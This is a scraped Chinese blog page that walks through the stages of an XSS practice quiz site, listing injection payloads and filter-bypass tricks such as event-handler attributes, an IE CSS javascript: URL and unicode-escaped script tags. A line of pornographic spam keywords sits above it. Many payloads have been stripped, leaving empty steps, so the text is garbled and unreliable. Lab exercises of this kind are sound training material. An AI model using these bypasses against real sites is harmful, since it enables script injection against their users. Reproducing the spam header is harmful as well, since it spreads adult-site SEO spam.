日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

XSS常见payload指的是什么

發布時間:2023/12/15 综合教程 33 生活家
生活随笔 收集整理的這篇文章主要介紹了 XSS常见payload指的是什么 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

這篇文章將為大家詳細講解有關XSS常見payload指的是什么,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

環境:http://xss-quiz.int21h.jp

一、Stage #1 無過濾xss漏洞

1、隨便輸入字符:123

2、輸入payload:

二、Stage #2 屬性中的xss漏洞

1、在窗口中輸入payload:

,查看審查元素,payload被寫在一個標簽中

或者 "onmouseover=alert(document.domain)>

三、Stage #3 選擇列表框中的xss漏洞

1、點擊search,抓包

2、修改post數據,添加payload:

,發送到repeater,send

四、隱藏提交參數的xss漏洞

">%0a

1、隨便輸入字符,search,抓包

2、在隱藏參數后面添加payload,forward,查看審查元素

3、閉合參數,重新構造payload:">

,發包,成功彈出

2、重新構造payload:"onmouseover="alert(document.domain)

或者">

3、成功彈出

六、空格分隔屬性中的xss漏洞

1、隨便輸入字符111 222 333

3、構造payload:111 onclick=alert(document.domain),成功彈出

八、繞過過濾xss漏洞

1、輸入payload:">

,審查元素,domain被過濾了

2、閉合payload,并修改100">

on事件,被替換成onxxx

3、使用偽協議加“ ”繞過

100"> xss

十、利用IE特性繞過過濾",``可以閉合雙引號,

``onmousemove=alert(document.domain)

僅針對IE瀏覽器

十一、利用css特性繞過過濾",IE低版本

background-color:#f00;background:url(javascript:alert(document.domain););

十三、十六進制繞過過濾

1、輸入

2、重新利用unicode構造payload:

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

總結

以上是生活随笔為你收集整理的XSS常见payload指的是什么的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。